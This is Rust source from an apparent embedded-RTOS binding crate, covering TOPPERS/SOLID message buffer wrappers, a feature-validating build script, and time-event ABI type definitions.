        /// The operation is not permitted in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Invalid object ID (`E_ID`) or the object does not exist (`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
    }
}
impl ErrorKind for InfoError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MessageBuffer::build`].
    #[cfg(all(feature = "dcre", not(feature = "asp3")))]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(all(feature = "dcre", not(feature = "asp3")))))]
    pub enum BuildError {
        /// The operation is not permitted in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(any())]
        AccessDenied,
        #[cfg(any())]
        NotSupported,
        /// Ran out of memory or message buffer IDs, or the specified block size
        /// or capacity does not fit in `uint_t`.
        #[cfg(not(feature = "none"))]
        OutOfMemory,
        /// Bad parameter.
        #[cfg(not(feature = "none"))]
        BadParam,
    }
}
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
impl ErrorKind for BuildError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // `E_MACV` is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_NOID | abi::E_NOMEM => Some(Self::OutOfMemory(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_PAR | abi::E_RSATR => Some(Self::BadParam(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MessageBufferRef::delete`].
    #[cfg(all(feature = "dcre", not(feature = "asp3")))]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(all(feature = "dcre", not(feature = "asp3")))))]
    pub enum DeleteError {
        /// The operation is not permitted in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Invalid object ID (`E_ID`) or the object does not exist (`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
        /// The object is in a state that forbids the operation (`E_OBJ`).
        #[cfg(not(feature = "none"))]
        BadState,
    }
}
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
impl ErrorKind for DeleteError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
/// Message buffer information returned by [`MessageBufferRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
    // The raw `T_RMBF` structure filled in by `ref_mbf`.
    #[cfg(not(feature = "none"))]
    raw: abi::T_RMBF,
}
impl Info {
    /// Get the number of free bytes.
    #[inline]
    pub fn free_byte_count(&self) -> usize {
        match () {
            #[cfg(not(feature = "none"))]
            () => self.raw.fmbfsz,
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// Get the number of stored messages.
    #[inline]
    pub fn len(&self) -> usize {
        match () {
            #[cfg(not(feature = "none"))]
            () => self.raw.smbfcnt as usize,
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// Get a flag indicating whether the message buffer is empty (i.e.,
    /// contains no messages).
    #[inline]
    pub fn is_empty(&self) -> bool {
        self.len() == 0
    }
    /// Get the first waiting sender's task ID.
    ///
    /// Returns `None` if no task is waiting to send.
    #[inline]
    pub fn first_waiting_sending_task_id(&self) -> Option<abi::NonNullID> {
        match () {
            #[cfg(not(feature = "none"))]
            () => abi::NonNullID::new(self.raw.stskid),
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// Get the first waiting receiver's task ID.
    ///
    /// Returns `None` if no task is waiting to receive.
    #[inline]
    pub fn first_waiting_receiving_task_id(&self) -> Option<abi::NonNullID> {
        match () {
            #[cfg(not(feature = "none"))]
            () => abi::NonNullID::new(self.raw.rtskid),
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// Literally anything.
///
/// Blanket-implemented for every type (including unsized ones); used by the
/// send/receive methods below to accept an arbitrary message payload.
pub trait Unknown {}
impl<T: ?Sized> Unknown for T {}
/// A borrowed reference to a message buffer.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct MessageBufferRef<'a> {
    // The non-null kernel object ID of the referenced message buffer.
    id: abi::NonNullID,
    // Ties the reference's validity to the lifetime `'a`.
    _phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for MessageBufferRef<'_> {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        // Render as `MessageBuffer(<id>)`.
        write!(f, "MessageBuffer({id})", id = self.id)
    }
}
/// # Object ID conversion
impl MessageBufferRef<'_> {
    /// Construct a `MessageBufferRef` from a raw object ID.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
        Self {
            id,
            _phantom: PhantomData,
        }
    }
    /// Get the raw object ID.
    #[inline]
    pub const fn as_raw(self) -> abi::ID {
        self.id.get()
    }
    /// Get the raw object ID as [`abi::NonNullID`].
    #[inline]
    pub const fn as_raw_nonnull(self) -> abi::NonNullID {
        self.id
    }
}
/// # Management
impl MessageBufferRef<'_> {
/// `del_mbf`: Delete the message buffer.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
#[doc(alias = "del_mbf")]
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
#[cfg_attr(
feature = "doc_cfg",
doc(cfg(all(feature = "dcre", not(feature = "asp3"))))
)]
pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::del_mbf(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ref_mbf`: Get the message buffer's general information.
#[inline]
#[doc(alias = "ref_mbf")]
pub fn info(self) -> Result<Info, Error<InfoError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::ref_mbf(self.as_raw(), pri.as_mut_ptr()))?;
Ok(Info {
raw: pri.assume_init(),
})
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// # Message Buffer Operations
impl MessageBufferRef<'_> {
/// `snd_mbf`: Send a message to the message buffer. Blocks the current task
/// if the message buffer is full.
///
/// The message contents are read from `message`'s in-memory representation
/// (`size_of_val(message)` bytes starting at its address).
#[inline]
#[doc(alias = "snd_mbf")]
pub fn send(self, message: &(impl Unknown + ?Sized)) -> Result<(), Error<SendError>> {
    match () {
        #[cfg(not(feature = "none"))]
        () => unsafe {
            // If the message size doesn't fit in `uint_t`, it's guaranteed
            // to exceed the message buffer's maximum message size.
            // Safety: `E_PAR` is handled by `SendError`
            // (Warning: This is not true for `cfg(feature = "none")`.)
            let size = core::mem::size_of_val(message)
                .try_into()
                .ok()
                .ok_or_else(|| Error::new_unchecked(ErrorCode::new_unchecked(abi::E_PAR)))?;
            Error::err_if_negative(abi::snd_mbf(
                self.as_raw(),
                message as *const _ as *const u8,
                size,
            ))?;
            Ok(())
        },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `tsnd_mbf`: Send a message to the message buffer. Blocks the current
/// task with timeout if the message buffer is full.
#[inline]
#[doc(alias = "tsnd_mbf")]
pub fn send_timeout(
    self,
    message: &(impl Unknown + ?Sized),
    tmo: Timeout,
) -> Result<(), Error<SendTimeoutError>> {
    match () {
        #[cfg(not(feature = "none"))]
        () => unsafe {
            // If the message size doesn't fit in `uint_t`, it's guaranteed
            // to exceed the message buffer's maximum message size.
            // Safety: `E_PAR` is handled by `SendTimeoutError`
            // (Warning: This is not true for `cfg(feature = "none")`.)
            let size = core::mem::size_of_val(message)
                .try_into()
                .ok()
                .ok_or_else(|| Error::new_unchecked(ErrorCode::new_unchecked(abi::E_PAR)))?;
            Error::err_if_negative(abi::tsnd_mbf(
                self.as_raw(),
                message as *const _ as *const u8,
                size,
                tmo.as_raw(),
            ))?;
            Ok(())
        },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `psnd_mbf`: Send a message to the message buffer. Fails and returns an
/// error if the message buffer is full.
#[inline]
#[doc(alias = "psnd_mbf")]
pub fn try_send(self, message: &(impl Unknown + ?Sized)) -> Result<(), Error<TrySendError>> {
    match () {
        #[cfg(not(feature = "none"))]
        () => unsafe {
            // If the message size doesn't fit in `uint_t`, it's guaranteed
            // to exceed the message buffer's maximum message size.
            // Safety: `E_PAR` is handled by `TrySendError`
            // (Warning: This is not true for `cfg(feature = "none")`.)
            let size = core::mem::size_of_val(message)
                .try_into()
                .ok()
                .ok_or_else(|| Error::new_unchecked(ErrorCode::new_unchecked(abi::E_PAR)))?;
            Error::err_if_negative(abi::psnd_mbf(
                self.as_raw(),
                message as *const _ as *const u8,
                size,
            ))?;
            Ok(())
        },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `rcv_mbf`: Receive a message from the message buffer. Blocks the current
/// task if the message buffer is empty.
///
/// On success, the received message will be written to `*out`, and the
/// message size, measured in bytes, will be returned.
///
/// # Rationale
///
/// This method is named `recv` instead of `receive` following the suit of
/// `std::sync::mpsc::Receiver::recv` and `std::net::UdpSocket::recv`.
///
/// # Safety
///
/// `*out` must be large enough to fit the message. After this method
/// overwrites `*out` with the received message, the resultant content of
/// `*out` must be valid for its type.
#[inline]
#[doc(alias = "rcv_mbf")]
pub unsafe fn recv(self, out: &mut (impl Unknown + ?Sized)) -> Result<usize, Error<RecvError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let size =
Error::err_if_negative(abi::rcv_mbf(self.as_raw(), out as *mut _ as *mut u8))?;
Ok(size as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `trcv_mbf`: Receive a message to the message buffer. Blocks the current
/// task with timeout if the message buffer is empty.
///
/// # Safety
///
/// See [`Self::recv`].
#[inline]
#[doc(alias = "trcv_mbf")]
pub unsafe fn recv_timeout(
self,
out: &mut (impl Unknown + ?Sized),
tmo: Timeout,
) -> Result<usize, Error<RecvTimeoutError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let size = Error::err_if_negative(abi::trcv_mbf(
self.as_raw(),
out as *mut _ as *mut u8,
tmo.as_raw(),
))?;
Ok(size as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `prcv_mbf`: Receive a message to the message buffer. Fails and returns
/// an error if the message buffer is empty.
///
/// # Safety
///
/// See [`Self::recv`].
#[inline]
#[doc(alias = "prcv_mbf")]
pub unsafe fn try_recv(
self,
out: &mut (impl Unknown + ?Sized),
) -> Result<usize, Error<TryRecvError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let size =
Error::err_if_negative(abi::prcv_mbf(self.as_raw(), out as *mut _ as *mut u8))?;
Ok(size as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ini_mbf`: Initialize the message buffer.
#[inline]
#[doc(alias = "ini_mbf")]
pub fn initialize(self) -> Result<(), Error<InitializeError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::ini_mbf(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
// Note that TOPPERS/ASP3 doesn't support dynamic creation of message buffers
// because message buffers and dynamic creation are provided by separate
// extensions.
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
pub use self::owned::*;
#[cfg(all(feature = "dcre", not(feature = "asp3")))]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
    use super::*;
    /// The builder type for [message buffers](MessageBuffer).
    /// Created by [`MessageBuffer::build`].
    ///
    /// Its generic parameters are an implementation detail.
    #[cfg_attr(
        feature = "doc_cfg",
        doc(cfg(all(feature = "dcre", not(feature = "asp3"))))
    )]
    #[must_use = "`Builder` creates nothing unless you call `.finish()`"]
    pub struct Builder<Capacity, MaxMessageSize> {
        // Type-state markers: each mandatory field starts as a "hole" marker
        // type and becomes `()` once the corresponding setter has been called,
        // so `finish` is only callable on `Builder<(), ()>`.
        capacity: Capacity,
        max_message_size: MaxMessageSize,
        // `true` iff the requested `maxmsz` didn't fit in `uint_t`. The
        // failure is deferred to `finish`, which reports it as `E_NOMEM`,
        // keeping `max_message_size` itself infallible.
        maxmsz_overflow: bool,
        #[cfg(not(feature = "none"))]
        raw: abi::T_CMBF,
    }
    /// Builder field hole types
    #[allow(non_camel_case_types)]
    #[doc(hidden)]
    pub mod builder_hole {
        pub struct __block_size_is_not_specified__;
        pub struct __block_count_is_not_specified__;
    }
    impl MessageBuffer {
        /// `acre_mbf`: Create a builder for `MessageBuffer`.
        ///
        /// # Examples
        ///
        /// ```rust,no_run
        /// use itron::messagebuffer::MessageBuffer;
        /// let buffer = MessageBuffer::build()
        ///     .capacity(128)
        ///     .max_message_size(64)
        ///     .finish()
        ///     .expect("failed to create a message buffer");
        ///
        /// buffer.as_ref().send(&[0u8; 32])
        ///     .expect("failed to send a message");
        ///
        /// let mut got_message = [0u8; 64];
        /// let got_message_len = unsafe {
        ///     buffer
        ///         .as_ref()
        ///         .recv(&mut got_message)
        ///         .expect("failed to receive a message")
        /// };
        /// assert_eq!(got_message_len, 32);
        /// ```
        ///
        #[inline]
        #[doc(alias = "acre_mbf")]
        pub fn build() -> Builder<
            builder_hole::__block_size_is_not_specified__,
            builder_hole::__block_count_is_not_specified__,
        > {
            Builder {
                capacity: builder_hole::__block_size_is_not_specified__,
                max_message_size: builder_hole::__block_count_is_not_specified__,
                maxmsz_overflow: false,
                #[cfg(not(feature = "none"))]
                raw: abi::T_CMBF {
                    mbfatr: abi::TA_NULL,
                    mbfsz: 0,
                    maxmsz: 0,
                    mbfmb: core::ptr::null_mut(),
                },
            }
        }
    }
    impl<Capacity, MaxMessageSize> Builder<Capacity, MaxMessageSize> {
        /// (**Mandatory**) Specify the capacity, measured in bytes.
        #[inline]
        pub fn capacity(self, value: usize) -> Builder<(), MaxMessageSize> {
            Builder {
                capacity: (),
                max_message_size: self.max_message_size,
                maxmsz_overflow: self.maxmsz_overflow,
                #[cfg(not(feature = "none"))]
                raw: abi::T_CMBF {
                    mbfsz: value,
                    ..self.raw
                },
            }
        }
        /// (**Mandatory**) Specify the maximum message size, measured in bytes.
        #[inline]
        pub fn max_message_size(self, value: usize) -> Builder<Capacity, ()> {
            // `maxmsz` is a `uint_t`; remember an out-of-range request instead
            // of failing here, and let `finish` report it.
            let (maxmsz, maxmsz_overflow) = match value.try_into() {
                Ok(x) => (x, false),
                Err(_) => (0, true),
            };
            Builder {
                capacity: self.capacity,
                max_message_size: (),
                maxmsz_overflow,
                #[cfg(not(feature = "none"))]
                raw: abi::T_CMBF { maxmsz, ..self.raw },
            }
        }
    }
    impl Builder<(), ()> {
        /// Create a message buffer using the specified parameters.
        #[allow(unused_mut)]
        pub fn finish(mut self) -> Result<MessageBuffer, Error<BuildError>> {
            match () {
                #[cfg(not(feature = "none"))]
                () => unsafe {
                    if self.maxmsz_overflow {
                        // Safety: `E_NOMEM` is handled by `BuildError`
                        // (Warning: This is not true for `cfg(feature = "none")`.)
                        return Err(Error::new_unchecked(ErrorCode::new_unchecked(abi::E_NOMEM)));
                    }
                    let id = Error::err_if_negative(abi::acre_mbf(&self.raw))?;
                    // Safety: We own the message buffer we create
                    Ok(MessageBuffer::from_raw_nonnull(
                        abi::NonNullID::new_unchecked(id),
                    ))
                },
                #[cfg(feature = "none")]
                () => unimplemented!(),
            }
        }
    }
    /// An owned message buffer.
    ///
    /// [Deletes] the message buffer automatically when dropped. The destructor will
    /// panic if the deletion fails.
    ///
    /// [Deletes]: MessageBufferRef::delete
    #[derive(PartialEq, Eq)]
    #[cfg_attr(
        feature = "doc_cfg",
        doc(cfg(all(feature = "dcre", not(feature = "asp3"))))
    )]
    pub struct MessageBuffer(MessageBufferRef<'static>);
    impl fmt::Debug for MessageBuffer {
        #[inline]
        fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
            // Delegate to the inner `MessageBufferRef`'s representation.
            self.0.fmt(f)
        }
    }
    impl Drop for MessageBuffer {
        #[inline]
        fn drop(&mut self) {
            // Safety: `self.0` refers to a kernel object this value owns.
            unsafe { self.0.delete().unwrap() };
        }
    }
    impl MessageBuffer {
        /// Construct a `MessageBuffer` from a raw object ID.
        ///
        /// # Safety
        ///
        /// See [Object ID Wrappers](crate#object-id-wrappers).
        #[inline]
        pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
            Self(unsafe { MessageBufferRef::from_raw_nonnull(id) })
        }
        /// Consume and "leak" `self`, returning a reference `MessageBufferRef<'a>`.
        #[inline]
        pub const fn leak<'a>(self) -> MessageBufferRef<'a> {
            // `forget` suppresses `Drop`, so the kernel object is never deleted.
            let out = self.0;
            core::mem::forget(self);
            out
        }
        /// Get the raw object ID.
        #[inline]
        pub const fn as_raw(&self) -> abi::ID {
            self.0.as_raw()
        }
        /// Get the raw object ID as [` abi::NonNullID`].
        #[inline]
        pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
            self.0.as_raw_nonnull()
        }
        /// Borrow `MessageBuffer` as [`MessageBufferRef`].
        ///
        /// Use this to perform operations on message buffers because most of the
        /// methods are implemented on `MessageBufferRef` but not `MessageBuffer`.
        #[inline]
        pub const fn as_ref(&self) -> MessageBufferRef<'_> {
            self.0
        }
    }
}
<file_sep>/build.rs
use std::{env, fmt::Write, fs, path::Path};
/// Build script: validates the Cargo-feature kernel selection and generates
/// the source of `itron::macros` into `$OUT_DIR/macros.rs`.
fn main() {
    // Validate the kernel selection and default to the `none` pseudo-kernel
    // if no kernel feature is selected
    const KERNEL_LIST: &[&str] = &["asp3", "fmp3", "solid_asp3", "solid_fmp3"];
    let selected_kernels: Vec<_> = KERNEL_LIST
        .iter()
        .filter(|name| {
            env::var_os(format!("CARGO_FEATURE_{}", name.to_ascii_uppercase())).is_some()
        })
        .collect();
    if selected_kernels.len() > 1 {
        panic!("more than one kernel is selected: {:?}", selected_kernels);
    }
    if selected_kernels.is_empty() {
        // Default to `none` if none are selected
        // (Maintainer note: Please make sure to synchronize the transitive
        // features with `Cargo.toml`)
        println!("cargo:rustc-cfg=feature=\"none\"");
        println!("cargo:rustc-cfg=feature=\"dcre\"");
        println!("cargo:rustc-cfg=feature=\"rstr_task\"");
        println!("cargo:rustc-cfg=feature=\"messagebuf\"");
        println!("cargo:rustc-cfg=feature=\"ovrhdr\"");
        println!("cargo:rustc-cfg=feature=\"subprio\"");
        println!("cargo:rustc-cfg=feature=\"pi_mutex\"");
        println!("cargo:rustc-cfg=feature=\"systim_local\"");
        println!("cargo:rustc-cfg=feature=\"exd_tsk\"");
    }
    // Generate code for `itron::macros`
    let mut macros_rs = String::new();
    // Shorthand: append a formatted fragment to `macros_rs`.
    macro_rules! w {
        ($($tt:tt)*) => {
            write!(macros_rs, $($tt)*).unwrap()
        };
    }
    for kernel in KERNEL_LIST.iter().cloned().chain(["none"]) {
        w!(
            r#"
/// Get the kernel selected by a Cargo feature.
///
/// # Example
///
/// ```
/// let kernel = tt_call::tt_call! {{ macro = [{{ itron::macros::tt_kernel }}] }};
///
/// println!("We are running on {{}}", kernel);
/// ```
///
#[cfg(feature = "{kernel}")]
pub macro tt_kernel($caller:tt) {{
    tt_call::tt_return! {{
        $caller
        output = [{{ "{kernel}" }}]
    }}
}}
            "#,
            kernel = kernel,
        );
        w!(
            r#"
/// Determine if this crate was compiled for the specified kernel.
///
/// # Example
///
/// ```
/// tt_call::tt_if! {{
///     condition = [{{ itron::macros::tt_is_kernel }}]
///     input = [{{ "asp3" }}]
///     true = [{{ println!("We are on TOPPERS/ASP3, yay!"); }}]
///     false = [{{}}]
/// }}
/// ```
///
#[cfg(feature = "{kernel}")]
pub macro tt_is_kernel {{
    (
        $caller:tt
        input = [{{ "{kernel}" $(| $($rest:tt)* )? }}]
    ) => {{
        tt_call::tt_return! {{
            $caller
            is = [{{ true }}]
        }}
    }},
    (
        $caller:tt
        input = [{{ $other_kernel:literal $(| $($rest:tt)* )? }}]
    ) => {{
        tt_is_kernel! {{
            $caller
            input = [{{ $( $($rest)* )? }}]
        }}
    }},
    (
        $caller:tt
        input = [{{ }}]
    ) => {{
        tt_call::tt_return! {{
            $caller
            is = [{{ false }}]
        }}
    }},
}}
            "#,
            kernel = kernel,
        );
    }
    let out_dir = env::var_os("OUT_DIR").unwrap();
    // Fix: the second argument had been garbled to `¯os_rs` by a broken
    // HTML-entity round-trip (`&macr` → `¯`); the intended value is a
    // reference to the generated source buffer.
    fs::write(&Path::new(&out_dir).join("macros.rs"), &macros_rs).unwrap();
}
<file_sep>/src/abi/time.rs
#![allow(unused_imports)]
use super::{uint_t, ATR, ER, ER_ID, EXINF, FLGPTN, HRTCNT, ID, MODE, RELTIM, STAT, SYSTIM};
/*
 * Type definitions for processing units
 */
/// Time event handler entry point
pub type TMEHDR = Option<unsafe extern "C" fn(EXINF)>;
/*
 * Object attributes
 */
/// Create the cyclic notification in the operational (started) state
pub const TA_STA: ATR = 0x02;
/*
 * Notification processing mode definitions
 */
/// Call a time event handler
pub const TNFY_HANDLER: MODE = 0x00;
/// Set a variable
pub const TNFY_SETVAR: MODE = 0x01;
/// Increment a variable
pub const TNFY_INCVAR: MODE = 0x02;
/// Activate a task
pub const TNFY_ACTTSK: MODE = 0x03;
/// Wake up a task
pub const TNFY_WUPTSK: MODE = 0x04;
/// Release a semaphore resource
pub const TNFY_SIGSEM: MODE = 0x05;
/// Set an eventflag
pub const TNFY_SETFLG: MODE = 0x06;
/// Send to a dataqueue
pub const TNFY_SNDDTQ: MODE = 0x07;
/// Error notification: set a variable
pub const TENFY_SETVAR: MODE = 0x10;
/// Error notification: increment a variable
pub const TENFY_INCVAR: MODE = 0x20;
/// Error notification: activate a task
pub const TENFY_ACTTSK: MODE = 0x30;
/// Error notification: wake up a task
pub const TENFY_WUPTSK: MODE = 0x40;
/// Error notification: release a semaphore
pub const TENFY_SIGSEM: MODE = 0x50;
/// Error notification: set an eventflag
pub const TENFY_SETFLG: MODE = 0x60;
/// Error notification: send to a dataqueue
pub const TENFY_SNDDTQ: MODE = 0x70;
/// TOPPERS/ASP3 `T_RCYC`
#[cfg(any(feature = "asp3", feature = "solid_asp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RCYC {
    /// Operational state of the cyclic notification
    pub cycstat: STAT,
    /// Relative time until the next notification time
    pub lefttim: RELTIM,
}
/// TOPPERS/FMP3 `T_RCYC`
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RCYC {
    /// Operational state of the cyclic notification
    pub cycstat: STAT,
    /// Relative time until the next notification time
    pub lefttim: RELTIM,
    /// ID of the assigned processor
    pub prcid: ID,
}
/// TOPPERS/ASP3 `T_RALM`
#[cfg(any(feature = "asp3", feature = "solid_asp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RALM {
    /// Operational state of the alarm notification
    pub almstat: STAT,
    /// Relative time until the notification time
    pub lefttim: RELTIM,
}
/// TOPPERS/FMP3 `T_RALM`
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RALM {
    /// Operational state of the alarm notification
    pub almstat: STAT,
    /// Relative time until the notification time
    pub lefttim: RELTIM,
    /// ID of the assigned processor
    pub prcid: ID,
}
/// TOPPERS/ASP3 `T_ROVR` (overrun handler state)
#[cfg(all(feature = "asp3", feature = "ovrhdr"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_ROVR {
    /// Operational state of the overrun handler
    pub ovrstat: STAT,
    /// Remaining processor time
    pub leftotm: super::PRCTIM,
}
/// TOPPERS/ASP3 `T_CCYC`
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_CCYC {
    /// Cyclic notification attributes
    pub cycatr: ATR,
    /// Notification method of the cyclic notification
    pub nfyinfo: T_NFYINFO,
    /// Notification period of the cyclic notification
    pub cyctim: RELTIM,
    /// Notification phase of the cyclic notification
    pub cycphs: RELTIM,
}
/// SOLID/FMP3 `T_CCYC`
#[cfg(all(feature = "solid_fmp3", feature = "dcre"))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_CCYC {
    /// Cyclic notification attributes
    pub cycatr: ATR,
    /// Notification method of the cyclic notification
    pub nfyinfo: T_NFYINFO,
    /// Notification period of the cyclic notification
    pub cyctim: RELTIM,
    /// Notification phase of the cyclic notification
    pub cycphs: RELTIM,
    #[cfg(feature = "systim_local")]
    /// Initially assigned processor of the cyclic notification
    pub iprcid: ID,
    #[cfg(feature = "systim_local")]
    /// Assignable processors of the cyclic notification
    pub affinity: uint_t,
}
/// TOPPERS/ASP3 `T_CALM`
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_CALM {
    /// Alarm notification attributes
    pub almatr: ATR,
    /// Notification method of the alarm notification
    pub nfyinfo: T_NFYINFO,
}
/// SOLID/FMP3 `T_CALM`
#[cfg(all(feature = "solid_fmp3", feature = "dcre"))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_CALM {
    /// Alarm notification attributes
    pub almatr: ATR,
    /// Notification method of the alarm notification
    pub nfyinfo: T_NFYINFO,
    #[cfg(feature = "systim_local")]
    /// Initially assigned processor of the alarm notification
    pub iprcid: ID,
    #[cfg(feature = "systim_local")]
    /// Assignable processors of the alarm notification
    pub affinity: uint_t,
}
/*
 * Packet format definitions for time event notification methods
 */
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub struct T_NFYINFO {
    /// Notification processing mode
    pub nfymode: MODE,
    /// Auxiliary information for the time event notification
    pub nfy: T_NFY,
    /// Auxiliary information for the error notification
    pub enfy: T_ENFY,
}
/// [`T_NFYINFO::nfy`]
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub union T_NFY {
    pub handler: T_NFY_HDR,
    pub setvar: T_NFY_VAR,
    pub incvar: T_NFY_IVAR,
    pub acttsk: T_NFY_TSK,
    pub wuptsk: T_NFY_TSK,
    pub sigsem: T_NFY_SEM,
    pub setflg: T_NFY_FLG,
    pub snddtq: T_NFY_DTQ,
}
/// [`T_NFYINFO::enfy`]
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Clone, Copy)]
#[repr(C)]
pub union T_ENFY {
    pub setvar: T_ENFY_VAR,
    pub incvar: T_NFY_IVAR,
    pub acttsk: T_NFY_TSK,
    pub wuptsk: T_NFY_TSK,
    pub sigsem: T_NFY_SEM,
    pub setflg: T_NFY_FLG,
    pub snddtq: T_ENFY_DTQ,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy)]
#[repr(C)]
pub struct T_NFY_HDR {
    /// Extended information passed to the time event handler
    pub exinf: EXINF,
    /// Start address of the time event handler
    pub tmehdr: TMEHDR,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_VAR {
    /// Address of the variable
    pub p_var: *mut isize,
    /// Value to set
    pub value: isize,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_IVAR {
    /// Address of the variable
    pub p_var: *mut isize,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
